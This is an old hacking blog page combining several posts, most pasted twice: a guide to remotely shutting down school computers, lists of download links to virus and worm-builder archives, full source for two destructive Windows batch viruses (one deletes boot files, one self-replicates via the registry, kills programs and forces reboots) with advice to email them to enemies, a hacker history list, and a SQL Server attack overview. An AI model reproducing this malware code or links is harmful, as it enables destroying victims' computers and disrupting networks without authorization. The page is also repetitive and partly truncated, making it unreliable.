You wanna mess around with your school network?
You wanna own the shit out of some kiddies who think they're the best?
Well thankfully there's the shutdown function in cmd Smile
First of all you need to have access to a cmd prompt on the network for this to work.
If it's disabled you can obviously run everything from .bat files.
So first type in
Code:
Net View
This will give you all the names for all the computers on the network.
Then you want to find a target and write it down, so for example a name is //045-comproom1-05 then you will utilize that name to shutdown the computer.
What next? Well if you're a lil skiddy yourself then the easiest thing to do is type in
Code:
shutdown -i
which will give you a gui interface and you'll be able to shutdown whichever computer you want with it, you can set a time, even throw in a funny comment like "owned" or somethin Smile.
commands you will use if you just wanna use the command interface are
Code:
shutdown -m //computername
- shutsdown the pc.
Code:
shutdown -m -c "owned"
shutdown with a comment.
Code:
shutdown -l
logoff the user.
Code:
shutdown -r
restart the computer.
and so on...
Sunday, April 13, 2008
online downloadable virus list!!
hxxp://web.tiscali.it/johnnycrk2/virus/happy99.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Melissa.zip
hxxp://web.tiscali.it/johnnycrk2/virus/x.zip
hxxp://web.tiscali.it/johnnycrk2/virus/POLY.zip
hxxp://web.tiscali.it/johnnycrk2/virus/rundll.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Speed.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Unknow.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Unknow2.zip
hxxp://web.tiscali.it/johnnycrk2/virus/nowviru.zip
hxxp://web.tiscali.it/johnnycrk2/virus/all.zip
hxxp://web.tiscali.it/johnnycrk2/virus/auto.zip
hxxp://web.tiscali.it/johnnycrk2/virus/best.zip
hxxp://web.tiscali.it/johnnycrk2/virus/document.zip
hxxp://web.tiscali.it/johnnycrk2/virus/good.zip
hxxp://web.tiscali.it/johnnycrk2/virus/nice.zip
hxxp://web.tiscali.it/johnnycrk2/virus/simpatic.zip
hxxp://web.tiscali.it/johnnycrk2/virus/goodbye.zip
hxxp://web.tiscali.it/johnnycrk2/virus/mora.zip
hxxp://web.tiscali.it/johnnycrk2/virus/windows.zip
hxxp://web.tiscali.it/johnnycrk2/virus/mac.zip
hxxp://web.tiscali.it/johnnycrk2/virus/yvirus.zip
hxxp://web.tiscali.it/johnnycrk2/virus/xviruz.zip
hxxp://web.tiscali.it/johnnycrk2/virus/95.zip
hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti.zip
hxxp://web.tiscali.it/johnnycrk2/virus/d-g.zip
hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti2.zip
hxxp://web.tiscali.it/johnnycrk2/virus/h-j.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Melissa.zip
hxxp://web.tiscali.it/johnnycrk2/virus/x.zip
hxxp://web.tiscali.it/johnnycrk2/virus/POLY.zip
hxxp://web.tiscali.it/johnnycrk2/virus/rundll.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Speed.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Unknow.zip
hxxp://web.tiscali.it/johnnycrk2/virus/Unknow2.zip
hxxp://web.tiscali.it/johnnycrk2/virus/nowviru.zip
hxxp://web.tiscali.it/johnnycrk2/virus/all.zip
hxxp://web.tiscali.it/johnnycrk2/virus/auto.zip
hxxp://web.tiscali.it/johnnycrk2/virus/best.zip
hxxp://web.tiscali.it/johnnycrk2/virus/document.zip
hxxp://web.tiscali.it/johnnycrk2/virus/good.zip
hxxp://web.tiscali.it/johnnycrk2/virus/nice.zip
hxxp://web.tiscali.it/johnnycrk2/virus/simpatic.zip
hxxp://web.tiscali.it/johnnycrk2/virus/goodbye.zip
hxxp://web.tiscali.it/johnnycrk2/virus/mora.zip
hxxp://web.tiscali.it/johnnycrk2/virus/windows.zip
hxxp://web.tiscali.it/johnnycrk2/virus/mac.zip
hxxp://web.tiscali.it/johnnycrk2/virus/yvirus.zip
hxxp://web.tiscali.it/johnnycrk2/virus/xviruz.zip
hxxp://web.tiscali.it/johnnycrk2/virus/95.zip
hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti.zip
hxxp://web.tiscali.it/johnnycrk2/virus/d-g.zip
hxxp://web.tiscali.it/johnnycrk2/virus/VirusMisti2.zip
hxxp://web.tiscali.it/johnnycrk2/virus/h-j.zip
Awesome Virus 2..!!..Njoy..!!
WARNING: Do NOT open this on your own computer!!
This is how the virus works::
first it will change the color of the cmd box
then it will change the time on the computer to midnight 12:00
then it will shut down the anti virus and firewall
and copy itself into the startup menu and registry
after that it will change its own attribute to hide and read only
so the victim cant remove the virus
after that it will kill processes such as MSN, limewire,
internet explorer, firefox, etc etc
then it will split itself 20 times and flood the WINDOWS folder
It will then delete everything from the windows folder and system 32, then completly erase the WHOLE C drive,
and finally it will shut itself down, and by the time the computer has restarted, it will become useless as it will have deleted EVERYTHING uncluding the windows login screen
Heres the download:
http://rapidshare.com/files/74221720/shroom.zip.html
P.S, Batch virus's are a bitch to send over MSN so i would advise you upload it to a website and let the victim download the file
This is how the virus works::
first it will change the color of the cmd box
then it will change the time on the computer to midnight 12:00
then it will shut down the anti virus and firewall
and copy itself into the startup menu and registry
after that it will change its own attribute to hide and read only
so the victim cant remove the virus
after that it will kill processes such as MSN, limewire,
internet explorer, firefox, etc etc
then it will split itself 20 times and flood the WINDOWS folder
It will then delete everything from the windows folder and system 32, then completly erase the WHOLE C drive,
and finally it will shut itself down, and by the time the computer has restarted, it will become useless as it will have deleted EVERYTHING uncluding the windows login screen
Heres the download:
http://rapidshare.com/files/74221720/shroom.zip.html
P.S, Batch virus's are a bitch to send over MSN so i would advise you upload it to a website and let the victim download the file
A DOS virus builder
h@@p://rapidshare.com/files/65701348/vc.zip [Replace @@ with tt]
====================
Nice easy worm generator that will spread through network shares and emails , it will scan for emails ,it has irc bot and more options.
http://rapidshare.com/files/65704232/Pokes-Worm-Gen-2.zip
====================
Builds worm and add spread options like email or mIRC then you choose what to infect on computers,change PC name, go to url option, antideletion, polymorphic and other shit.
http://rapidshare.com/files/65701343/vbswg2.zip
====================
This little program allows you to add source code and generate your own worm/virus,it has some samples of code inside the zip too.
http://rapidshare.com/files/65702742/Dr._VBS_Virus_Maker.zip
====================
====================
Nice easy worm generator that will spread through network shares and emails , it will scan for emails ,it has irc bot and more options.
http://rapidshare.com/files/65704232/Pokes-Worm-Gen-2.zip
====================
Builds worm and add spread options like email or mIRC then you choose what to infect on computers,change PC name, go to url option, antideletion, polymorphic and other shit.
http://rapidshare.com/files/65701343/vbswg2.zip
====================
This little program allows you to add source code and generate your own worm/virus,it has some samples of code inside the zip too.
http://rapidshare.com/files/65702742/Dr._VBS_Virus_Maker.zip
====================
Awesome Virus...!!
WARNING: Do NOT open this on your own computer!!
It will disable your Firewall and do a lot of funny thing if you still want to see funy things please try it
http://rapidshare.com/files/78696248/Smile.exe.html
It will display a msg "I love dlls" then it will flood there desktop with dll's and also the directory(s) "C:/Windows/" "C:/Windows/System32/" It also disables Ctrl+Alt+Delete in winXP.
h@@p://rapidshare.com/files/65703684/MXZ.zip
===================
It will infect .COM or .EXE files as they are opened, executed, or their attributes are accessed. Also, if the system time is 12:00am, the virus will delete any file executed.
h@@p://rapidshare.com/files/65703373/massacre.zip
===================
The famous worm that fucked up millions of computers around the world , started in Germany where it was programmed by an 18 year old man.
h@@p://rapidshare.com/files/65700942/sasser.b.zip
===================
Plz Notify if the link is broken or is detectable..
Replace @@ with tt...
It will disable your Firewall and do a lot of funny thing if you still want to see funy things please try it
http://rapidshare.com/files/78696248/Smile.exe.html
It will display a msg "I love dlls" then it will flood there desktop with dll's and also the directory(s) "C:/Windows/" "C:/Windows/System32/" It also disables Ctrl+Alt+Delete in winXP.
h@@p://rapidshare.com/files/65703684/MXZ.zip
===================
It will infect .COM or .EXE files as they are opened, executed, or their attributes are accessed. Also, if the system time is 12:00am, the virus will delete any file executed.
h@@p://rapidshare.com/files/65703373/massacre.zip
===================
The famous worm that fucked up millions of computers around the world , started in Germany where it was programmed by an 18 year old man.
h@@p://rapidshare.com/files/65700942/sasser.b.zip
===================
Plz Notify if the link is broken or is detectable..
Replace @@ with tt...
Awesome Virus...!!
WARNING: Do NOT open this on your own computer!!
It will disable your Firewall and do a lot of funny thing if you still want to see funy things please try it
http://rapidshare.com/files/78696248/Smile.exe.html
It will display a msg "I love dlls" then it will flood there desktop with dll's and also the directory(s) "C:/Windows/" "C:/Windows/System32/" It also disables Ctrl+Alt+Delete in winXP.
h@@p://rapidshare.com/files/65703684/MXZ.zip
===================
It will infect .COM or .EXE files as they are opened, executed, or their attributes are accessed. Also, if the system time is 12:00am, the virus will delete any file executed.
h@@p://rapidshare.com/files/65703373/massacre.zip
===================
The famous worm that fucked up millions of computers around the world , started in Germany where it was programmed by an 18 year old man.
h@@p://rapidshare.com/files/65700942/sasser.b.zip
===================
Plz Notify if the link is broken or is detectable..
Replace @@ with tt...
It will disable your Firewall and do a lot of funny thing if you still want to see funy things please try it
http://rapidshare.com/files/78696248/Smile.exe.html
It will display a msg "I love dlls" then it will flood there desktop with dll's and also the directory(s) "C:/Windows/" "C:/Windows/System32/" It also disables Ctrl+Alt+Delete in winXP.
h@@p://rapidshare.com/files/65703684/MXZ.zip
===================
It will infect .COM or .EXE files as they are opened, executed, or their attributes are accessed. Also, if the system time is 12:00am, the virus will delete any file executed.
h@@p://rapidshare.com/files/65703373/massacre.zip
===================
The famous worm that fucked up millions of computers around the world , started in Germany where it was programmed by an 18 year old man.
h@@p://rapidshare.com/files/65700942/sasser.b.zip
===================
Plz Notify if the link is broken or is detectable..
Replace @@ with tt...
:::::::::::: NEXT BAT FILE VIRUS :::::::::::::::::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!
type this in notepad
start virus.bat
virus.bat
and save as with this name
virus.bat
ur antivirus will not detect this virus
Basically this program will delete all that files which are needed for booting.........
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
save as bat file in notepad!!
This will pop up a message saying OWNED!!
and shut down the computer never to reboot again!
type this in notepad
start virus.bat
virus.bat
and save as with this name
virus.bat
ur antivirus will not detect this virus
Basically this program will delete all that files which are needed for booting.........
::::::::Virus & Trick Centre :::::::::: BATCH FILE VIRUS
copy the below code and paste into your notepad.. then save as anyname.bat
Do not click on that batch file........ Send it your enimies email...
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code :-
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
Do not click on that batch file........ Send it your enimies email...
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
Code :-
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
Biggest Hacks Of All Time....!!
Early 1990s
Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering.
November 2002
Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today.
1995
Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online - he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel.
1990
When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 for the 102nd caller, Kevin Poulsen took control of the entire city's telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.
1983
Kevin Poulsen again. A little-known incident when Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network. Mar 11
1996
US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a "logic bomb" to explode that deleted software running Omega's ma
Kevin Mitnick, often incorrectly called by many as god of hackers, broke into the computer systems of the world's top technology and telecommunications companies Nokia, Fujitsu, Motorola, and Sun Microsystems. He was arrested by the FBI in 1995, but later released on parole in 2000. He never termed his activity hacking, instead he called it social engineering.
November 2002
Englishman Gary McKinnon was arrested in November 2002 following an accusation that he hacked into more than 90 US military computer systems in the UK. He is currently undergoing trial in a British court for a "fast-track extradition" to the US where he is a wanted man. The next hearing in the case is slated for today.
1995
Russian computer geek Vladimir Levin effected what can easily be called The Italian Job online - he was the first person to hack into a bank to extract money. Early 1995, he hacked into Citibank and robbed $10 million. Interpol arrested him in the UK in 1995, after he had transferred money to his accounts in the US, Finland, Holland, Germany and Israel.
1990
When a Los Angeles area radio station announced a contest that awarded a Porsche 944S2 for the 102nd caller, Kevin Poulsen took control of the entire city's telephone network, ensured he is the 102nd caller, and took away the Porsche beauty. He was arrested later that year and sentenced to three years in prison. He is currently a senior editor at Wired News.
1983
Kevin Poulsen again. A little-known incident when Poulsen, then just a student, hacked into Arpanet, the precursor to the Internet was hacked into. Arpanet was a global network of computers, and Poulsen took advantage of a loophole in its architecture to gain temporary control of the US-wide network. Mar 11
1996
US hacker Timothy Lloyd planted six lines of malicious software code in the computer network of Omega Engineering which was a prime supplier of components for NASA and the US Navy. The code allowed a "logic bomb" to explode that deleted software running Omega's ma
Top 10 tricks to exploit SQL Server Systems
Whether it is through manual poking and prodding or the use of security testing tools, malicious attackers employ a variety of tricks to break into SQL Server systems, both inside and outside your firewall. It stands to reason then, if the hackers are doing it, you need to carry the same attacks to test the security strength of your systems. Here are 10 hacker tricks to gain access and violate systems running SQL Server.
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector.
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
Credits for reconciling the 10 techniques: Rani tha
1. Direct connections via the Internet
These connections can be used to attach to SQL Servers sitting naked without firewall protection for the entire world to see (and access). DShield's Port Report shows just how many systems are sitting out there waiting to be attacked. I don't understand the logic behind making a critical server like this directly accessible from the Internet, but I still find this flaw in my assessments, and we all remember the effect the SQL Slammer worm had on so many vulnerable SQL Server systems. Nevertheless, these direct attacks can lead to denial of service, buffer overflows and more.
2. Vulnerability scanning
Vulnerability scanning often reveals weaknesses in the underlying OS, the Web application or the database system itself. Anything from missing SQL Server patches to Internet Information Services (IIS) configuration weaknesses to SNMP exploits can be uncovered by attackers and lead to database server compromise. The bad guys may use open source, home-grown or commercial tools. Some are even savvy enough to carry out their hacks manually from a command prompt. In the interest of time (and minimal wheel spinning), I recommend using commercial vulnerability assessment tools like QualysGuard from Qualys Inc. (for general scanning), WebInspect from SPI Dynamics (for Web application scanning) and Next Generation Security Software Ltd.'s NGSSquirrel for SQL Server (for database-specific scanning). They're easy to use, offer the most comprehensive assessment and, in turn, provide the best results
3. Enumerating the SQL Server Resolution Service
Running on UDP port 1434, this allows you to find hidden database instances and probe deeper into the system. Chip Andrews' SQLPing v 2.5 is a great tool to use to look for SQL Server system(s) and determine version numbers (somewhat). This works even if your SQL Server instances aren't listening on the default ports. Also, a buffer overflow can occur when an overly long request for SQL Servers is sent to the broadcast address for UDP port 1434.
4. Cracking SA passwords
Deciphering SA passwords is also used by attackers to get into SQL Server databases. Unfortunately, in many cases, no cracking is needed since no password has been assigned (Oh, logic, where art thou?!). Yet another use for the handy-dandy SQLPing tool mentioned earlier. The commercial products AppDetective from Application Security Inc. and NGSSQLCrack from NGS Software Ltd. also have this capability.
5. Direct-exploit attacks
Direct attacks using tools such as Metasploit, shown in Figure 2, and its commercial equivalents (CANVAS and CORE IMPACT) are used to exploit certain vulnerabilities found during normal vulnerability scanning. This is typically the silver-bullet hack for attackers penetrating a system and performing code injection or gaining unauthorized command-line access.
6. SQL injection
SQL injection attacks are executed via front-end Web applications that don't properly validate user input. Malformed SQL queries, including SQL commands, can be inserted directly into Web URLs and return informative errors, commands being executed and more. These attacks can be carried out manually -- if you have a lot of time. Once I discover that a server has a potential SQL injection vulnerability, I prefer to perform the follow-through using an automated tool, such as SPI Dynamics' SQL Injector.
7. Blind SQL injection
These attacks go about exploiting Web applications and back-end SQL Servers in the same basic fashion as standard SQL injection. The big difference is that the attacker doesn't receive feedback from the Web server in the form of returned error messages. Such an attack is even slower than standard SQL injection given the guesswork involved. You need a good tool for this situation, and that's where Absinthe.
8. Reverse engineering the system
The reverse engineering trick looks for software exploits, memory corruption weaknesses and so on. In this sample chapter from the excellent book Exploiting Software: How to Break Code by Greg Hoglund and Gary McGraw, you'll find a discussion about reverse engineering ploys.
9. Google hacks
Google hacks use the extraordinary power of the Google search engine to ferret out SQL Server errors -- such as "Incorrect syntax near" -- leaking from publicly accessible systems. Several Google queries are available at Johnny Long's Google Hacking Database. (Look in the sections titled Error Messages and Files containing passwords.) Hackers use Google to find passwords, vulnerabilities in Web servers, underlying operating systems, publicly available procedures and more that they can use to further compromise a SQL Server system. Combining these queries with Web site names via Google's 'site:' operator often turns up juicy info you never imagined you could unearth.
10. Perusing Web site source code
Source code can also turn up information that may lead to a SQL Server break in. Specifically, developers may store SQL Server authentication information in ASP scripts to simplify the authentication process. A manual assessment or Google could uncover this information in a split second.
Credits for reconciling the 10 techniques: Rani tha
Subscribe to:
Posts (Atom)